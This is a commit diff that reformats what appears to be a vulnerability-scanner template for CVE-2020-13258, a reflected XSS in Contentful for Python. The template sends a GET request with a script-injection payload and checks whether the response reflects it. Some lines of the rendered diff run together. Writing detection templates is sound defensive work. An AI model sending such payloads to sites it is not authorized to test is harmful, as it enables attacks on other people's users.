lint fixes

patch-1
sandeep 2022-01-07 13:04:40 +05:30
parent c3360c9d23
commit 6b30e12e86
1 changed files with 6 additions and 6 deletions

View File

@ -7,14 +7,14 @@ info:
description: Contentful through 2020-05-21 for Python allows reflected XSS. description: Contentful through 2020-05-21 for Python allows reflected XSS.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13258 reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13258
tags: cve,cve2020,contentful,xss tags: cve,cve2020,contentful,xss
requests:
- method: GET
path:
- '{{BaseURL}}/?cda'"<evil><script>alert(document.domain)</script>&locale=locale=de-DE'
matchers-condition: and requests:
- raw:
- |
GET /?cda'"<evil><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1
Host: {{Hostname}}
matchers: matchers:
- type: word - type: word
words: words:
- "<evil><script>alert(document.domain)</script>" - "<evil><script>alert(document.domain)</script>"
condition: and